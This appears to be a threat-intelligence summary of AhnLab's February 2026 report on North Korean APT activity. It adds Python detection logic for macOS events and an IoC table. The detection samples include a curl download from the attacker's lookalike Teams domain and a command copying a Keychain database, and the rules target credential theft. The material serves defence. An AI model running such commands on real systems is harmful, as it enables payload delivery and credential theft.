February 2026 APT Group Trends Report
2026-03-11 • AhnLab • February 2026 APT Group Trends Report
AhnLab’s February 2026 APT trends report highlighted North Korea-linked activity involving Lazarus, BlueNoroff, UNC1069, and TA-RedAnt/APT37 alongside other global APT operations. The Lazarus section said the group used Medusa ransomware against U.S. healthcare organizations, a mental-health nonprofit, autism education facilities, U.S. private companies, and Middle East organizations, with tools including Comebacker, Blindingcan, ChromeStealer, Mimikatz, Infohook, curl, and RP_Proxy. The BlueNoroff-related Prospect Call activity used Telegram and Microsoft Teams lures to make macOS users run terminal commands, download payloads from a lookalike Teams domain, stage files with AppleScript, and copy Keychain databases for credential theft. TA-RedAnt/APT37 activity targeted air-gapped environments with LNK-based initial access, Zoho WorkDrive C2, Ruby droppers, and USB-based command delivery and data exfiltration, showing continued North Korean focus on financial gain, social engineering, credential theft, and segmented-network intrusion.
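As an added illustration that is not part of AhnLab's report, the Python below shows detection logic a defender could run over macOS process-execution events to flag the two Prospect Call behaviours described above: a download tool contacting the lookalike Teams domain listed in the IoC table (or any other Teams-themed host outside microsoft.com) and a process touching a Keychain database file. The event format and the sample lines are constructed assumptions, not telemetry from the report.

```python
import re

# Indicator taken from the report's IoC table; everything else here is assumed.
LOOKALIKE_DOMAIN = "teams.microscall.com"
LEGIT_DOMAINS = ("microsoft.com",)  # hosts Teams legitimately talks to
DOWNLOAD_TOOLS = {"curl", "osascript"}
KEYCHAIN_RE = re.compile(r"Library/Keychains/\S*\.keychain(?:-db)?", re.I)
URL_HOST_RE = re.compile(r"https?://([^/\s]+)")

# Constructed sample events: "<timestamp> <user> <process> <command line>"
SAMPLE_EVENTS = [
    "2026-02-03T10:01:12Z alice curl curl -fsSL https://teams.microscall.com/update.sh -o /tmp/u.sh",
    "2026-02-03T10:01:15Z alice cp cp ~/Library/Keychains/login.keychain-db /tmp/.k",
    "2026-02-03T10:02:00Z bob curl curl https://teams.microsoft.com/api/health",
    "2026-02-03T10:02:40Z bob curl curl https://teams-update.example.net/setup",
    "2026-02-03T10:03:30Z carol cp cp ~/Documents/notes.txt /tmp/notes.bak",
]


def is_microsoft_host(host: str) -> bool:
    h = host.lower()
    return any(h == d or h.endswith("." + d) for d in LEGIT_DOMAINS)


def classify_event(line: str) -> list[str]:
    """Return the detection names an event trips (empty list if benign)."""
    _ts, _user, proc, cmd = line.split(" ", 3)
    findings = []
    if proc in DOWNLOAD_TOOLS:
        for host in URL_HOST_RE.findall(cmd):
            if host.lower() == LOOKALIKE_DOMAIN:
                findings.append(f"ioc-match:{host}")
            elif "teams" in host.lower() and not is_microsoft_host(host):
                findings.append(f"lookalike-teams-host:{host}")
    # Only the system keychain tooling should normally read these files.
    if KEYCHAIN_RE.search(cmd) and proc not in ("security", "securityd"):
        findings.append("keychain-db-access")
    return findings


def scan(events: list[str]) -> list[tuple[str, str, list[str]]]:
    """Collect (timestamp, user, findings) for every event that fires a rule."""
    hits = []
    for line in events:
        findings = classify_event(line)
        if findings:
            ts, user, _rest = line.split(" ", 2)
            hits.append((ts, user, findings))
    return hits


if __name__ == "__main__":
    for ts, user, findings in scan(SAMPLE_EVENTS):
        print(ts, user, ", ".join(findings))
```

Correlating both findings on the same user within a short window, as the first two sample events show for "alice", is the stronger signal; either alone is worth triage.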
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| DOMAIN | teams.microscall.com | 2026-01-29 | 2026-03-11 |